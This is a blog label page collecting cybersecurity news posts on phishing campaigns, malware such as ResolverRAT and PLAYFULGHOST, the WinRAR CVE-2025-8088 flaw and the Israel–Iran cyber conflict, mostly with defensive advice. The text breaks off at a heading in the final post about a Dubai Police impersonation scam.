Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Phishing Attacks. Show all posts
Ransomwares
acronis AI cyberattacks AI technology Cyber Defenses Cyber Security Cybersecurity Threats Indian Cyber Security Malwares Phishing Attacks Ransomwares

India Most Targeted by Malware as AI Drives Surge in Ransomware and Phishing Attacks

 

India has become the world’s most-targeted nation for malware, according to the latest report by cybersecurity firm Acronis, which highlights how artificial intelligence is fueling a sharp increase in ransomware and phishing activity. The findings come from the company’s biannual threat landscape analysis, compiled by the Acronis Threat Research Unit (TRU) and its global network of sensors tracking over one million Windows endpoints between January and June 2025. 

The report indicates that India accounted for 12.4 percent of all monitored attacks, placing it ahead of every other nation. Analysts attribute this trend to the rising sophistication of AI-powered cyberattacks, particularly phishing campaigns and impersonation attempts that are increasingly difficult to detect. With Windows systems still dominating business environments compared to macOS or Linux, the operating system remained the primary target for threat actors. 

Ransomware continues to be the most damaging threat to medium and large businesses worldwide, with newer criminal groups adopting AI to automate attacks and enhance efficiency. Phishing was found to be a leading driver of compromise, making up 25 percent of all detected threats and over 52 percent of those aimed at managed service providers, marking a 22 percent increase compared to the first half of 2024. 

Commenting on the findings, Rajesh Chhabra, General Manager for India and South Asia at Acronis, noted that India’s rapidly expanding digital economy has widened its attack surface significantly. He emphasized that as attackers leverage AI to scale operations, Indian enterprises—especially those in manufacturing and infrastructure—must prioritize AI-ready cybersecurity frameworks. He further explained that organizations need to move away from reactive security approaches and embrace behavior-driven models that can anticipate and adapt to evolving threats. 

The report also points to collaboration platforms as a growing entry point for attackers. Phishing attempts on services like Microsoft Teams and Slack spiked dramatically, rising from nine percent to 30.5 percent in the first half of 2025. Similarly, advanced email-based threats such as spoofed messages and payload-less attacks increased from nine percent to 24.5 percent, underscoring the urgent requirement for adaptive defenses. 

Acronis recommends that businesses adopt a multi-layered protection strategy to counter these risks. This includes deploying behavior-based threat detection systems, conducting regular audits of third-party applications, enhancing cloud and email security solutions, and reinforcing employee awareness through continuous training on social engineering and phishing tactics. 

The findings make clear that India’s digital growth is running parallel to escalating cyber risks. As artificial intelligence accelerates the capabilities of malicious actors, enterprises will need to proactively invest in advanced defenses to safeguard critical systems and sensitive data.
Read more »
Phishing Attacks
Artificial Intelligence Credential Theft Cyber Attacks Cybercrime Infrastructure Cybersecurity awareness Gmail Security Multi-Layered Deception Phishing Attacks

New Gmail Phishing Attack Exploits Login Flow to Steal Credentials

 


Despite today's technologically advanced society, where convenience and connectivity are the norms, cyber threats continue to evolve at an alarming rate, making it extremely dangerous to live in. It has recently been reported that phishing attacks and online scams are on the rise among U.S. consumers, warning that malicious actors are increasingly targeting login credentials to steal personal and financial information from their customers. Those concerns are echoed by the Federal Bureau of Investigation (FBI), which revealed that online scams accounted for a staggering $16.6 billion in losses last year—a jump of 33 per cent compared with the year prior.

The extent to which the problem is increasing has been highlighted in surveys that have revealed more than 60 per cent of Americans feel scam attempts are increasing, and nearly one in three have experienced a data breach regularly. Taking these figures together, it is apparent that fortifying digital defences against an ever-expanding threat landscape is of utmost importance. 

Phishing itself is not new; however, its evolution has been dramatic over the past few decades. Previously, such scams could be easily detected due to their clumsy emails that contained spelling errors and awkward greetings like "Dear User." Today's attacks are much more sophisticated. In this latest Gmail phishing campaign, Google's legitimate login process is accurately mimicked with alarming accuracy, deceiving even tech-savvy users. 

It has been documented by security researchers that thousands of Gmail accounts have been compromised, with stolen credentials opening the door to a broad range of infiltrations, including banking, retail, and social networking sites. A breach like this is compared to an intruder entering one's digital home with the key to the rightful owner. 

A breach of this kind can cause long-lasting damage both financially and personally because it extends well beyond inconvenience. Investigations have shown that this campaign is based on deception and abuse of trusted infrastructures. Fraudulent "New Voice Notification" emails are a way for scammers to get victims by phoning them with fake sender information and making them listen to their voicemails. This attack begins with a legitimate Microsoft Dynamics marketing platform, which lends instant credibility to it, thereby enabling it to bypass many standard security controls. 

A CAPTCHA page on horkyrown[.]com, which can be traced to Pakistan, then redirects victims to a fake login page that looks exactly like Gmail's login page, which makes them feel like they're being hacked before giving them the real thing. When credentials are exfiltrated in real time, the account can be taken over almost immediately. Adding more complexity to this problem is the advent of artificial intelligence in phishing operations. 

Cybercriminals are now making perfect emails, mimicking writing styles, and even making convincing voice calls impersonating trusted figures, utilising advanced language models. According to security companies, artificial intelligence-driven phishing attempts are just as effective as human-crafted ones - if not more so - showing a 55 per cent increase between 2023 and 2025 in success rates. 

With the use of techniques such as metadata spoofing and "Open Graph Spoofing," attackers can further disguise malicious links, essentially making them almost indistinguishable from safe ones with the help of these techniques. In this new wave of phishing, which has become increasingly personalised, multimodal, and distributed at unprecedented scales, it is becoming increasingly difficult to detect. 

The FBI, as well as the Cybersecurity and Infrastructure Security Agency (CISA), have already issued warnings regarding artificial intelligence-enhanced phishing campaigns that target Gmail accounts. There was one case in which Ethereum developer Nick Johnson told of receiving a fraudulent “subpoena” email that passed Gmail's authentication checks and appeared to be just like a legitimate security alert. In similar attacks, phone calls and email have been used to harvest recovery codes, enabling full account takeover. 

Additionally, analysts found that attackers stole session cookies, enabling them to bypass login screens and bypass the entire process. Although Google's filters are now blocking nearly 10 million malicious emails per minute, experts warn that attackers are adapting faster, making stronger authentication measures and user vigilance essential. 

According to the technical analysis of the attack, it has been discovered that the (purpxqha[.]ru) Russian servers used to redirect traffic and perform cross-site requests should be responsible for the attack, while the primary domain name infrastructure was registered in Karachi, Pakistan. 

Using the malicious system, multiple layers of security within Gmail are bypassed, allowing hackers to not only collect email addresses and password combinations, but also two-factor authentication codes, Google Authenticator tokens, backup recovery keys, and even responses to security questions, enabling the attackers to completely take control of victims' accounts before they are aware that they have been compromised. Security experts have made several recommendations to organisations, including blocking identified domains, strengthening monitoring, and educating users about these evolving attack vectors. It must be noted that the Gmail phishing craze reflects a broader reality: cybersecurity is no longer a passive discipline but is a continuous discipline that must adapt to the speed of innovation as it evolves. 

There is no doubt that cultivating digital scepticism is a priority for individuals—they should question every unexpected email, voicemail, or login request, and they should reinforce their accounts with two-factor authentication or hardware security keys to ensure their accounts remain secure. A company’s responsibilities extend further, as they invest in employee awareness training, conduct mock phishing exercises, and implement adaptive tools capable of detecting subtle changes in behaviour. 

A cross-government collaboration between industry leaders, governments, and security researchers will be crucial to the dismantling of criminal infrastructure that exploits global trust. The need for vigilance in an environment where deception is becoming increasingly sophisticated each day has become more than an act of precaution, but a form of empowerment. This allows individuals and businesses alike to protect their digital identities from increasingly sophisticated threats while simultaneously protecting their digital identities.
Read more »
Phishing Attacks
Cyber Attacks Cyber War Cyber Warfare Cyberhacking Hacking Attack Iran Iranian hackers Isreal Phishing Attacks

Israel and Iran Cyber War Escalates After June Conflict Despite Ceasefire

 

The long-running cyber conflict between Israel and Iran has intensified following the June war, according to a recent report by the Financial Times. Israeli officials disclosed that they began receiving suspicious text messages containing malicious links soon after the 12-day conflict. One official, speaking anonymously, confirmed that the attacks have not stopped, emphasizing that the cyber hostilities remain active despite a temporary ceasefire on the battlefield. 

Recent incidents highlight the scale of the digital confrontation. Iranian hackers have been linked to phishing campaigns targeting Israeli diplomats and government officials, while also attempting to exploit vulnerabilities in Microsoft software to infiltrate Israeli networks. 

In parallel, Israel and groups aligned with its interests have launched disruptive cyberattacks on Iran, underscoring how digital warfare has become a central element in the shadow war between the two nations. During the June conflict, Iran’s Ministry of Communications reported facing what it described as its most extensive cyberattack campaign to date, with more than 20,000 incidents in just 12 days. 

One attack temporarily disabled Iran’s air defense systems as Israeli Air Force jets launched strikes on Tehran on June 13. Israeli cybersecurity experts later described the air defense breach as a tactical move designed to give Israel an initial advantage, while stressing that intelligence gathering on Iranian military figures and nuclear scientists was the most significant outcome. 

On the other side, an Israeli-aligned hacking group known as Gonjeshke Darande claimed responsibility for siphoning around $90 million from the Iranian cryptocurrency exchange Nobitex, transferring the funds into a wallet that could not be accessed. Nobitex rejected accusations that it operated as a regime tool, though the same group also targeted two major Iranian banks, including state-owned Bank Sepah. 

These attacks reportedly crippled banking systems by disabling not only primary data but also backup and disaster recovery servers, according to Dotin, the software provider for the affected banks. Meanwhile, Iranian-backed hackers conducted cyber operations against 50 Israeli companies, including firms in logistics, human resources, and defense-related sectors.

Leaked resumes of thousands of Israeli citizens linked to defense work were published online. Attackers also attempted to manipulate Israelis by sending fake messages that appeared to come from the Home Front Command, advising civilians to avoid bomb shelters during missile strikes. Other attempts focused on breaching security camera systems to track the locations of incoming rockets. 

Despite these efforts, Israeli cybersecurity officials argue that the cyberattacks on their country have caused minimal disruption. Iran, however, appears to have suffered more significant setbacks. Senior Iranian officials acknowledged weaknesses in their systems, citing the country’s centralized data structures as a vulnerability exploited by Israeli forces. 

The scale of the damage prompted calls within Iran for urgent measures to strengthen its cyber defense capabilities. Experts believe the cyber war will continue to escalate, as it allows both sides to strike at one another without triggering immediate international backlash. Analysts note that while conventional attacks risk provoking strong responses from global powers, operations in cyberspace often proceed unchecked. 

For Israel and Iran, the digital battlefield has become a critical front in their decades-long struggle, one that persists even when guns fall silent.
Read more »
zero-day exploit
CVE-2025-8088 directory traversa malware Phishing Attacks RomCom malware WinRAR vulnerability zero-day exploit

WinRAR Flaw Exploited as Zero-Day to Spread RomCom Malware in Phishing Attacks

 

A recently patched security flaw in WinRAR, identified as CVE-2025-8088, was weaponized as a zero-day exploit in phishing campaigns to deliver the RomCom malware, security researchers revealed.

The vulnerability, a directory traversal bug, was addressed in WinRAR version 7.13. It enabled attackers to craft malicious archives that could extract files into arbitrary file paths defined by the attacker rather than those selected by the user.

According to the WinRAR 7.13 changelog: "When extracting a file, previous versions of WinRAR, Windows versions of RAR, UnRAR, portable UnRAR source code and UnRAR.dll can be tricked into using a path, defined in a specially crafted archive, instead of user specified path."

It further clarified that "Unix versions of RAR, UnRAR, portable UnRAR source code and UnRAR library, also as RAR for Android, are not affected."

By exploiting this flaw, attackers could place executables in Windows autorun directories, such as:
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (user-specific)
  • %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp (system-wide)
This ensured that the malicious files would automatically run on the next reboot, giving attackers remote code execution capabilities.

Since WinRAR lacks an auto-update mechanism, users are urged to manually download the latest version from win-rar.com to protect themselves against this vulnerability.

The vulnerability was uncovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET. Strýček confirmed to BleepingComputer that the bug was actively exploited: "ESET has observed spearphishing emails with attachments containing RAR files," he said.

These malicious archives were used to deploy RomCom backdoors. Also known as Storm-0978, Tropical Scorpius, or UNC2596, RomCom is a Russia-linked cybercrime group tied to ransomware, credential theft, and extortion operations.

The group has a track record of leveraging zero-day exploits and developing custom malware to maintain persistence, steal sensitive data, and conduct espionage operations. RomCom has also been associated with ransomware families such as Cuba and Industrial Spy.

ESET confirmed that a detailed report on the exploitation of this flaw will be released in the coming weeks.
Read more »
ResolverRAT
Cybersecurity malware Malware analysis Phishing Attacks Remote Access Trojan ResolverRAT

New ResolverRAT Malware Targets Healthcare and Pharma Sectors Worldwide

 

A newly discovered remote access trojan (RAT), dubbed ResolverRAT, is being actively used in targeted cyberattacks against healthcare and pharmaceutical entities across various countries. Identified by cybersecurity researchers at Morphisec, the malware is delivered through phishing emails and uses in-memory execution tactics that allow it to bypass most traditional endpoint security solutions.

The attack campaign is tailored to different regions, with phishing messages crafted in native languages such as Czech, Italian, Turkish, Hindi, Portuguese, and Indonesian. These deceptive emails often reference legal or copyright-related issues to lure users into clicking malicious links. Victims unknowingly download a legitimate executable, hpreader.exe, which is manipulated through a technique called reflective DLL loading—executing the malicious code entirely in memory.

Morphisec researchers note that the attack leverages DLL side-loading: by placing a malicious DLL alongside a trusted but vulnerable application, the malware is executed when the genuine software is launched. Further, ResolverRAT exploits the .NET ‘ResourceResolve’ event to load malicious assemblies, avoiding typical flagged API calls.

“This resource resolver hijacking represents malware evolution at its finest – utilizing an overlooked .NET mechanism to operate entirely within managed memory, circumventing traditional security monitoring focused on Win32 API and file system operations,” wrote Morphisec’s Nadav Lorber in a blog.

ResolverRAT is equipped with multiple anti-analysis capabilities. It features a complex state machine that obfuscates its control flow and fingerprints system behaviors, making it difficult for sandboxes and debugging tools to detect or analyze.

To maintain persistence, the malware writes XOR-obfuscated keys into up to 20 Windows registry entries and replicates itself in directories such as Startup and LocalAppData. It connects to its command-and-control (C2) server at irregular intervals, further concealing its network activity from pattern-based detection tools.

The RAT handles commands using separate threads, which enables parallel task execution and reduces crash risks. For data exfiltration, it employs a chunked transfer method—splitting files larger than 1MB into smaller 16KB segments sent only when the socket is ready, a strategy that supports stealth and transfer recovery in poor network conditions.

ResolverRAT encrypts its payload with AES-256 in CBC mode via the .NET System.Security.Cryptography library. The keys and IVs are obfuscated and only decoded at runtime. Additionally, the payload is compressed using GZip and runs exclusively in memory to minimize detection risk.

While some of the phishing infrastructure resembles earlier Rhadamanthys and Lumma campaigns, Morphisec emphasized that the unique design of ResolverRAT's loader and payload warrants its classification as a new malware strain.
Read more »
Technology
AI Security Cyber Threats Cybersecurity Strategy Data Breach human risk insider risk Phishing Attacks Technology

Over Half of Organizations Lack AI Cybersecurity Strategies, Mimecast Report Reveals

 

More than 55% of organizations have yet to implement dedicated strategies to counter AI-driven cyber threats, according to new research by Mimecast. The cybersecurity firm's latest State of Human Risk report, based on insights from 1,100 IT security professionals worldwide, highlights growing concerns over AI vulnerabilities, insider threats, and cybersecurity funding shortfalls.

The study reveals that 96% of organizations report improved risk management after adopting a formal cybersecurity strategy. However, security leaders face an increasingly complex threat landscape, with AI-powered attacks and insider risks posing significant challenges.

“Despite the complexity of challenges facing organisations—including increased insider risk, larger attack surfaces from collaboration tools, and sophisticated AI attacks—organisations are still too eager to simply throw point solutions at the problem,” said Mimecast’s human risk strategist VP, Masha Sedova. “With short-staffed IT and security teams and an unrelenting threat landscape, organisations must shift to a human-centric platform approach that connects the dots between employees and technology to keep the business secure.”

The report finds that 95% of organizations are leveraging AI for threat detection, endpoint security, and insider risk analysis. However, 81% express concerns over data leaks from generative AI (GenAI) tools. More than half lack structured strategies to combat AI-driven attacks, while 46% remain uncertain about their ability to defend against AI-powered phishing and deepfake threats.

Insider threats have surged by 43%, with 66% of IT leaders anticipating an increase in data loss from internal sources in the coming year. The report estimates that insider-driven data breaches, leaks, or theft cost an average of $13.9 million per incident. Additionally, 79% of organizations believe collaboration tools have heightened security risks, amplifying both intentional and accidental data breaches.

Despite 85% of organizations raising their cybersecurity budgets, 61% cite financial constraints as a barrier to addressing emerging threats and implementing AI-driven security solutions. The report underscores the need for increased investment in cybersecurity staffing, third-party security services, email security, and collaboration tool protection.

Although 87% of organizations conduct quarterly cybersecurity training, 33% of IT leaders remain concerned about employee mismanagement of email threats, while 27% cite security fatigue as a growing risk. 95% of organizations expect email-based cyber threats to persist in 2025, as phishing attacks continue to exploit human vulnerabilities.

Collaboration tools are expanding attack surfaces, with 44% of organizations reporting a rise in cyber threats originating from these platforms. 61% believe a cyberattack involving collaboration tools could disrupt business operations in 2025, raising concerns over data integrity and compliance.

The report highlights a shift from traditional security awareness training to proactive Human Risk Management. Notably, just 8% of employees are responsible for 80% of security incidents. Organizations are increasingly turning to AI-driven monitoring and behavioral analytics to detect and mitigate threats early. 72% of security leaders see human-centric cybersecurity solutions as essential in the next five years, signaling a shift toward advanced threat detection and risk mitigation.
Read more »
Phishing Attacks
Cyber Attacks cyberattacks trending news Netflix cybersecurity News phishing Phishing Attacks

Netflix Users Warned About AI-Powered Phishing Scam

 

Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.
Read more »
YouTube phishing scam
AI-generated scam Cyber Fraud Neal Mohan deepfake Phishing Attacks YouTube monetization fraud YouTube phishing scam

YouTube Alerts Creators About AI-Generated Phishing Scam Using CEO’s Video

 

YouTube has issued a warning about a new phishing scam where cybercriminals are using an AI-generated video of CEO Neal Mohan to deceive content creators and steal their credentials. The scammers distribute the video privately through emails, falsely claiming that YouTube is implementing changes to its monetization policy.

"We're aware that phishers have been sharing private videos to send false videos, including an AI-generated video of YouTube’s CEO Neal Mohan announcing changes in monetization," YouTube stated in a pinned post on its official community website. 

"YouTube and its employees will never attempt to contact you or share information through a private video. If a video is shared privately with you claiming to be from YouTube, the video is a phishing scam."

Ironically, the phishing emails warn recipients that YouTube will never contact users through private videos, urging them to report suspicious emails.

The fraudulent video’s description contains a malicious link directing users to a fake YouTube Partner Program (YPP) page (studio.youtube-plus[.]com). Here, creators are prompted to sign in to “confirm updated terms” to continue monetizing their content. However, this site is designed to steal login credentials. The scam also induces urgency, falsely stating that accounts will face restrictions—including an inability to upload or edit videos and receive monetization—if compliance is not confirmed within seven days. Once login details are entered, victims receive a message stating their channel is "pending" and are directed to open a document in the video description for more information, even if they input a random email and password.

These phishing emails have been circulating since late January, with YouTube confirming an investigation into the campaign beginning in mid-February. The company advises users to avoid clicking any embedded links, as they may redirect to phishing sites or install malware.

"Many phishers actively target creators by trying to find ways to impersonate YouTube by exploiting in-platform features to link to malicious content," the platform added. "Please always be aware and make sure not to open untrusted links or files!"

Several creators have already fallen victim to the scam, reporting that their channels were hijacked and used to broadcast live cryptocurrency fraud streams.

YouTube offers guidelines on identifying and reporting phishing attempts through its help center. Additionally, since August 2024, the platform has introduced a support assistant to aid users in recovering and securing compromised accounts.
Read more »
Phishing Attacks
Cyber Attacks CyberCriminal Evasion Tactics Hackers JavaScript Obfuscation Technique Phishing Attacks

Hackers Use Invisible Unicode Trick to Hide Phishing Attacks

 


Cybercriminals have discovered a new way to conceal malicious code inside phishing attacks by using invisible Unicode characters. This technique, identified by Juniper Threat Labs, has been actively used in attacks targeting affiliates of a U.S. political action committee (PAC). By making their scripts appear as blank space, hackers can evade detection from traditional security tools and increase the likelihood of successfully compromising victims. 

The attack, first observed in early January 2025, is more advanced than typical phishing campaigns. Hackers customized their messages using personal, non-public details about their targets, making the emails seem more legitimate. They also implemented various tricks to avoid detection, such as inserting debugger breakpoints and using timing checks to prevent cybersecurity professionals from analyzing the script. 

Additionally, they wrapped phishing links inside multiple layers of Postmark tracking links, making it harder to trace the final destination of the attack. The method itself isn’t entirely new. In October 2024, JavaScript developer Martin Kleppe introduced the idea as an experimental programming technique. However, cybercriminals quickly adapted it for phishing attacks. 

The trick works by converting each character in a JavaScript script into an 8-bit binary format. Instead of using visible numbers like ones and zeros, attackers replace them with invisible Hangul Unicode characters, such as U+FFA0 and U+3164. Since these characters don’t appear on-screen, the malicious code looks completely empty, making it difficult to detect with the naked eye or automated security scans. 

The hidden script is stored as a property inside a JavaScript object, appearing as blank space. A separate bootstrap script then retrieves the hidden payload using a JavaScript Proxy get() trap. When accessed, this proxy deciphers the invisible Unicode characters back into binary, reconstructing the original JavaScript code and allowing the attack to execute. To make detection even more difficult, hackers have layered additional evasion techniques. They use base64 encoding to further disguise the script and implement anti-debugging measures. If the script detects that it’s being analyzed—such as when someone tries to inspect it with a debugger—it will shut down immediately and redirect the user to a harmless website. 

This prevents cybersecurity researchers from easily studying the malware. This technique is particularly dangerous because it allows attackers to blend their malicious code into legitimate scripts without raising suspicion. The invisible payload can be injected into otherwise safe websites, and since it appears as empty space, many security tools may fail to detect it. 

Juniper Threat Labs linked two of the domains used in this campaign to the Tycoon 2FA phishing kit, a tool previously associated with large-scale phishing operations. This connection suggests that the technique could soon be adopted by other cybercriminals. As attackers continue to develop new evasion strategies, cybersecurity teams will need to create better detection methods to counter these hidden threats before they cause widespread damage.
Read more »
Windows
ADFS Microsoft Password Phishing Attacks Technology Windows

Hackers Steal Login Details via Fake Microsoft ADFS login pages

Microsoft ADFS login pages

A help desk phishing campaign attacked a company's Microsoft Active Directory Federation Services (ADFS) via fake login pages and stole credentials by escaping multi-factor authentication (MFA) safety.

The campaign attacked healthcare, government, and education organizations, targeting around 150 victims, according to Abnormal Security. The attacks aim to get access to corporate mail accounts for sending emails to more victims inside a company or launch money motivated campaigns such as business e-mail compromise (BEC), where the money is directly sent to the attackers’ accounts. 

Fake Microsoft ADFS login pages 

ADFS from Microsoft is a verification mechanism that enables users to log in once and access multiple apps/services, saving the troubles of entering credentials repeatedly. 

ADFS is generally used by large businesses, as it offers single sign-on (SSO) for internal and cloud-based apps. 

The threat actors send emails to victims spoofing their company's IT team, asking them to sign in to update their security configurations or accept latest policies. 

How victims are trapped

When victims click on the embedded button, it takes them to a phishing site that looks same as their company's authentic ADFS sign-in page. After this, the fake page asks the victim to put their username, password, and other MFA code and baits then into allowing the push notifications.

The phishing page asks the victim to enter their username, password, and the MFA code or tricks them into approving the push notification.

What do the experts say

The security report by Abnormal suggests, "The phishing templates also include forms designed to capture the specific second factor required to authenticate the targets account, based on the organization's configured MFA settings.” Additionally, "Abnormal observed templates targeting multiple commonly used MFA mechanisms, including Microsoft Authenticator, Duo Security, and SMS verification."

After the victim gives all the info, they are sent to the real sign-in page to avoid suspicious and make it look like an authentic process. 

However, the threat actors immediately jump to loot the stolen info to sign into the victim's account, steal important data, make new email filter rules, and try lateral phishing. 

According to Abnormal, the threat actors used Private Internet Access VPN to hide their location and allocate an IP address with greater proximity to the organization.  

Read more »
VPN malware threats
antivirus software cybersecurity tips malware Phishing Attacks PLAYFULGHOST malware SEO Poisoning VPN malware threats

This New Malware Exploits VPN Apps to Hijack Devices

 

A newly discovered malware, named PLAYFULGHOST, is causing concern among cybersecurity experts due to its versatile capabilities for data theft and system compromise. According to researchers, this malware employs techniques such as screen and audio capture, keylogging, remote shell access, and file transfer, enabling threat actors to launch further attacks.

PLAYFULGHOST is primarily delivered through phishing emails or SEO poisoning techniques, which distribute trojanized VPN applications. Once executed, it establishes persistence using four methods: the run registry key, scheduled tasks, Windows startup folder, and Windows services. This persistence allows the malware to collect a vast array of data, including keystrokes, screenshots, system metadata, clipboard content, and QQ account details, as well as information on installed security products.

The malware also exhibits advanced functionalities such as deploying additional payloads, blocking mouse or keyboard inputs, clearing event logs, deleting cache and browser profiles, and wiping messaging app data. Notably, it can use Mimikatz, a tool for extracting passwords, and a rootkit to conceal registry entries, files, and processes. PLAYFULGHOST further utilizes Terminator, an open-source utility, to disable security processes via a BYOVD (Bring Your Own Vulnerable Driver) attack.

The initial infection often begins with phishing emails containing lures such as warnings about code-of-conduct violations. Alternatively, it leverages SEO poisoning to distribute malicious versions of legitimate VPN apps like LetsVPN. For instance, one victim unknowingly launched a malicious executable disguised as an image file, which subsequently downloaded and executed PLAYFULGHOST. Google’s Managed Defense team notes that this backdoor shares features with the Gh0st RAT, whose source code was leaked in 2008.

PLAYFULGHOST infections employ DLL search order hijacking and sideloading to launch malicious DLLs, decrypting and loading the malware directly into memory. It also uses combined Windows shortcuts and rogue DLL construction for stealthy execution.

How to Protect Yourself

To avoid falling victim to PLAYFULGHOST, adopt the following security practices:
  • Be cautious with phishing emails: Verify the sender and context before clicking links or downloading attachments. If unsure, confirm directly with the sender or relevant departments.
  • Download only from trusted sources: Always access applications from official websites rather than links in emails or messages.
  • Avoid urgency traps: If contacted about urgent matters like account issues, manually visit the company’s website by typing its URL into your browser.
  • Strengthen account security: Use unique passwords, a password manager, two-factor authentication, and robust antivirus software across devices.
For additional protection, consider antivirus programs with integrated VPNs or hardened browsers for enhanced security. Stay informed about phishing techniques and remain vigilant online. As Google’s Managed Defense team warns, “PLAYFULGHOST’s sophistication highlights the need for constant vigilance against evolving cyber threats.”
Read more »
Trojan
Cyber Security Google AMP Phishing Attacks RATs Russia TikTok Trojan

Hackers Use Russian Domains for Phishing Attacks

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activities and a change in attack tactics. If you are someone who communicates via email regularly, keep a lookout for malicious or unusual activities, it might be a scam. The blog covers the latest attack tactics threat actors are using.

Malicious email escapes SEGs

Daily, at least one suspicious email escapes Secure Email Getaways (SEGs), like Powerpoint and Microsoft, every 45 seconds, showing a significant rise from last year’s attack rate of one of every 57 seconds, according to the insights from Cofense Intelligence’s third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.

The use of malicious Office documents, particularly those in.docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of.ru and.su top-level domains (TLDs). Domains with the.ru (Russia) and.su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.

Read more »
SVG attachments
cyber fraud prevention Cyber Security Cybersecurity email security Microsoft visio Phishing Attacks Ransomware threats SVG attachments

Cybercriminals Exploit Two-Step Phishing Tactics and SVG Attachments in Sophisticated Cyber Attacks

 

Layered defense strategies are a cornerstone of cybersecurity, but attackers are employing similar methods to launch sophisticated attacks. Two-step phishing (2SP) tactics are becoming increasingly prevalent, leveraging trusted platforms to deliver malicious content in layers and evade detection, according to researchers at Perception Point.

These researchers have identified a new wave of 2SP attacks weaponising Microsoft Visio (.vsdx) files. Peleg Cabra, product marketing manager at Perception Point, shared that Ariel Davidpur, a security researcher at the firm, uncovered an alarming trend: attackers are embedding malicious URLs within Visio files to bypass security systems.

Visio, widely used in workplaces for data visualization, plays into the attackers' strategy of exploiting familiarity. The files are being used in phishing emails containing urgent business-related requests. Once the recipient engages with these emails and accesses the Visio file, they encounter another embedded URL disguised as a clickable button, like “view document.”

Perception Point’s analysis highlights how attackers ask victims to hold the Ctrl key while clicking the URL, bypassing automated detection tools. This redirects users to a fake Microsoft 365 login page designed to steal credentials. Robust two-factor authentication is recommended to mitigate the risks of such attacks.

Additionally, a report by Lawrence Abrams from Bleeping Computer reveals another alarming technique: attackers are leveraging scalable vector graphics (SVG) files. These files, capable of displaying HTML and executing JavaScript, are being used to deliver phishing forms and malware. Security researcher MalwareHunterTeam demonstrated how SVG attachments could mimic an Excel spreadsheet with an embedded login form to harvest credentials.

To counter these threats, cybersecurity experts recommend treating SVG attachments with suspicion and implementing stringent email security measures.

International Fraud Awareness Week, held from November 17 to 23, 2024, aims to raise awareness of evolving cyber fraud. Muhammad Yahya Patel, lead security engineer at Check Point Software, warns that technological advancements empower both legitimate industries and cyber criminals.

Patel categorizes the major fraud types businesses should watch out for:
  • Cyber Fraud: Using phishing, malware, and ransomware to steal sensitive data.
  • Internal Fraud: Involving employee-driven actions like embezzlement and theft.
  • Invoice Fraud: Sending fake invoices to businesses for payment.
  • CEO Fraud: Impersonating executives to extract sensitive information.
  • Return Fraud: Exploiting return policies in retail for financial gain.
  • Payroll Fraud: Manipulating payroll systems to benefit employees fraudulently.
Ransomware has also evolved from untargeted attacks to highly strategic campaigns, employing reconnaissance and double-extortion tactics. As cyber threats grow more sophisticated, businesses must remain vigilant, adopt robust security practices, and foster awareness to combat evolving fraud.
Read more »
Police Scam
Cyber Attacks Cyber Fraud data security Data Theft Dubai Malicious Link Phishing Attacks Police Scam

Dubai Police Impersonation Scam: A Sophisticated Cybercrime Targeting UAE Residents

 

Cybercriminals have recently targeted the Dubai Police in an elaborate impersonation scam aimed at defrauding unsuspecting individuals in the UAE. Thousands of phishing text messages, pretending to be from law enforcement, were sent to trick recipients into clicking on malicious links. These links redirected victims to fake websites designed to steal sensitive information, including bank details and personal identification.

According to researchers at BforeAI, these campaigns employ official branding to appear legitimate, showcasing a calculated level of sophistication. While specifically targeting UAE residents, the campaign adopts a broad “spray-and-pray” phishing approach. It leverages fear and trust in law enforcement — a psychological factor especially potent in a country like the UAE, where respect for authority is deeply ingrained.

Abu Qureshi, a threat intelligence expert at BforeAI, emphasized how cybercriminals misuse Dubai Police branding to deceive victims. This tactic highlights an advanced understanding of social engineering, combining fear and the appearance of credibility. UAE citizens with limited awareness of digital threats are particularly susceptible to such scams, mistaking fraudulent communication for genuine correspondence.

The Rising Threat of Cybercrime in the UAE

The increase in cybercrime campaigns across the UAE and the Middle East mirrors global trends in cybercriminal activity. A report by Kaspersky revealed that 87% of UAE-based companies have encountered cyber incidents in the past two years. Several factors contribute to the UAE being an attractive target for cybercriminals:

  • Affluent population and wealth concentration.
  • Widespread internet access and rapid adoption of digital technologies.
  • Exploitation of vulnerabilities in newly implemented systems.

Financially motivated campaigns often focus on wealthy regions or individuals, while geopolitical dynamics and economic factors play a role in the increasing cyber threats in the region.

Advanced Techniques Used in the Dubai Police Scam

